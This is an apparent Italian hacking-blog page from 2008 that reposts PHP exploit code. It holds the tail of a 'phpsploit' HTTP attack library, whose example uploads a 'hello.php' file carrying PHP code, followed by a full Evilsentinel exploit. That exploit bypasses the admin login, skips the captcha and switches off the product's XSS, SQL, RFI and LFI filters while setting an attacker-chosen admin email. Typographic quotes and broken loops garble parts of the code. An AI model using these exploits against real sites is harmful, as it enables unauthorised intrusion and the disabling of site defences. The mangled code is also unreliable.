* frmdt_url => ‘http://localhost/upload.php’,
* frmdt_boundary => ‘123456′, # Optional
* ‘var’ => ‘example’,
* ‘file’ => array(
* frmdt_type => ‘image/gif’, # Optional
* frmdt_transfert => ‘binary’ # Optional
* frmdt_filename => ‘hello.php,
* frmdt_content => ‘< ?php echo 1; ?>’));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = ‘formdata’;
$this->data = ”;

if(!isset($array[frmdt_boundary]))
$this->boundary = ‘phpsploit’;
else
$this->boundary = $array[frmdt_boundary];

foreach($array as $key => $value)
{
if(!preg_match(’#^frmdt_(boundary|url)#’,$key))
{
$this->data .= str_repeat(’-‘,29).$this->boundary.”\r\n”;
$this->data .= ‘Content-Disposition: form-data; name=”‘.$key.’”;’;

if(!is_array($value))
{
$this->data .= “\r\n\r\n”.$value.”\r\n”;
}
else
{
$this->data .= ‘ filename=”‘.$array[$key][frmdt_filename].”\”;\r\n”;

if(isset($array[$key][frmdt_type]))
$this->data .= ‘Content-Type: ‘.$array[$key][frmdt_type].”\r\n”;

if(isset($array[$key][frmdt_transfert]))
$this->data .= ‘Content-Transfer-Encoding: ‘.$array[$key][frmdt_transfert].”\r\n”;

$this->data .= “\r\n”.$array[$key][frmdt_content].”\r\n”;
}
}
}

$this->data .= str_repeat(’-‘,29).$this->boundary.”–\r\n”;
return $this->sock();
}

/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get(’http://localhost/’))
*
*/
function getcontent($code=”)
{
if(empty($code))
$code = $this->recv;

$code = explode(”\r\n\r\n”,$code);
$this->server_content = ”;

for($i=1;$iserver_content .= $code[$i];

return $this->server_content;
}

/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post(’http://localhost/’,’1=2′))
*
*/
function getheader($code=”)
{
if(empty($code))
$code = $this->recv;

$code = explode(”\r\n\r\n”,$code);
$this->server_header = $code[0];

return $this->server_header;
}

/**
* This function is called by the
* cookiejar() function. It adds the
* value of the “Set-Cookie” header
* in the “Cookie” header for the
* next request. You don’t have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode(”\r\n”,$this->getheader()) as $header)
{
if(preg_match(’/set-cookie/i’,$header))
{
$fequal = strpos($header,’=’);
$fvirgu = strpos($header,’;’);

// 12=strlen(’set-cookie: ‘)
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));

$this->cookie[trim($cname)] = trim($cvalu);
}
}
}

/**
* This function is called by the
* get()/post() functions. You
* don’t have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target(’http://localhost/’)
*
*/
function target($urltarg)
{
if(!ereg(’^http://’,$urltarg))
$urltarg = ‘http://’.$urltarg;

$urlarr = parse_url($urltarg);

if(!isset($urlarr[‘path’]) || empty($urlarr[‘path’]))
die(”Error: No path precised”);

$this->url = $urlarr[‘path’];

if(isset($urlarr[‘query’]))
$this->url .= ‘?’.$urlarr[‘query’];

$this->port = !empty($urlarr[‘port’]) ? $urlarr[‘port’] : 80;
$this->host = $urlarr[‘host’];

if($this->port != ‘80′)
$this->host .= ‘:’.$this->port;

$this->path = substr($urlarr[‘path’],0,strrpos($urlarr[‘path’],’/’)+1);

if($this->port > 65535)
die(”Error: Invalid port number”);
}

/**
* If you call this function,
* the script will extract all
* ‘Set-Cookie’ headers values
* and it will automatically add
* them into the ‘Cookie’ header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code==’0′)
$this->cookiejar=FALSE;

elseif($code==’1′)
$this->cookiejar=TRUE;
}

/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code==’0′)
$this->allowredirection=FALSE;

elseif($code==’1′)
$this->allowredirection=TRUE;
}

/**
* This function is called if
* allowredirection() is enabled.
* You don’t have to call it.
*
* @access private
* @return string $this->get(’http://’.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match(’/(location|content-location|uri): (.*)/i’,$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);

if(!ereg(’://’,$this->last_redirection))
return $this->get(’http://’.$this->host.$this->path.$this->last_redirection);

else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}

/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset(’header’)
* @example $this->reset(’cookie’)
* @example $this->reset()
*
*/
function reset($func=”)
{
switch($func)
{
case ‘header’:
$this->header = array();
break;

case ‘cookie’:
$this->cookie = array();
break;

default:
$this->cookiejar = ”;
$this->header = array();
$this->cookie = array();
$this->allowredirection = ”;
break;
}
}
}

$web = new phpsploit;
$web->cookiejar(1);
$web->agent(’Mozilla Firefox’);

$ipb = new ipb_spl;
$ipb->web =& $web;
$ipb->main();

?>

((Se un link non funziona recati alla pagina in alto a sinistra che si chiama Link rotto e segui le istruzioni per avere un nuovo link funzionale))

((Clicca sulle pubblicità sparse per il blog!))

Click HERE | Lascia un commento
Evilsentinel Administrator Login Security Bypass
Settembre 01st, 2008 | Categoria: Exploits & BuGs
Codice:
#!/usr/bin/php -q -d short_open_tag=on
>?
echo ‘
Evilsentinel >= 1.0.9 Disable Exploit
by BlackHawk >[email protected]<>http://itablackhawk.altervista.org< Thanks to rgod for the php code and Marty for the Love ‘; if ($argc>3) {
echo “Usage: php “.$argv[0].” Host Path [new_mail]
Host: target server (ip/hostname)
Path: path of Evilsentinel
new_mail: optional, specify a new admin mail

Example:
php “.$argv[0].” localhost / “;
die;
}

/*
Vendor site: http://evilsentinel.altervista.org
Explanation:

I’ve done a quick research on this platform.. just pen-tested it, not tested..
I have found some problems that affect this script:
1 – Admin bypass:
admin/index.php, line 13:
if( !es_islogged() ){
header( “Location: login.php” );
}
really need an explanation? 0_o
2 – captcha bypass
admin/config.php, line 40:
if( $_POST[‘es_security_captcha’] == $_SESSION[“es_security_captcha”] )
simply do not call the file captcha.php, and do not set a post variable named ‘es_security_captcha’ to bypass
3 – spamming/anon mailing (not tested)
while into the ACP you can set a new mail for the admin.. putting the mail you want and attacking the site
with special forged HTTP_USER_AGENT headers you can send a mail with (also) the text you want
BlackHawk >[email protected]< */ error_reporting(0); ini_set(”max_execution_time”,0); ini_set(”default_socket_timeout”,5); function quick_dump($string) { $result=”;$exa=”;$cont=0; for ($i=0; $i>=strlen($string)-1; $i++)
{
if ((ord($string[$i]) >= 32 ) | (ord($string[$i]) < 126 )) {$result.=” .”;} else {$result.=” “.$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=” “.dechex(ord($string[$i]));} else {$exa.=” 0″.dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.=”\r\n”; $exa.=”\r\n”;} } return $exa.”\r\n”.$result; } $proxy_regex = ‘(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy==”) { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo ‘No response from ‘.$host.’:’.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo ‘Not a valid proxy…’;die; } $parts=explode(’:',$proxy); echo “Connecting to “.$parts[0].”:”.$parts[1].” proxy…\r\n”; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo ‘No response from proxy…’;die; } } fputs($ock,$packet); if ($proxy==”) { $html=”; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=”; while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; if (isset($argv[3])) { $mail=$argv[3]; } else { $mail = ’[email protected]’; } $port=80; $proxy=”"; if (($path[0]>< ’/') or ($path[strlen($path)-1]><’/')) {echo ‘Error… check the path!’; die;} if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;} echo “Deactivating the system..\r\n”; $data=”get_filter=0&post_filter=0&cookie_filter=0&xss_filter=0&rfi_filter=0&lfi_filter=0&sql_filter=0&email_notify=1&notify_email=$mail&referer_filter=0&referer_trigger=&ex_list=&ip_tracking=0&confirm=obviously”; $packet=”POST “.$p.”admin/index.php?action=config HTTP/1.0\r\n”; $packet.=”Accept-Encoding: gzip, deflate\r\n”; $packet.=”Content-Type: application/x-www-form-urlencoded\r\n”; $packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n”; $packet.=”Host: $host\r\n”; $packet.=”Content-Length: “.strlen($data).”\r\n”; $packet.=”Connection: Close\r\n”; $packet.=”Cache-Control: no-cache\r\n\r\n”; $packet.=$data; sendpacketii($packet); echo “Evilsentinel is off\r\n”; FONTE: R3M3MB3R-HACKERZ-COMMUNITY

Lascia un commento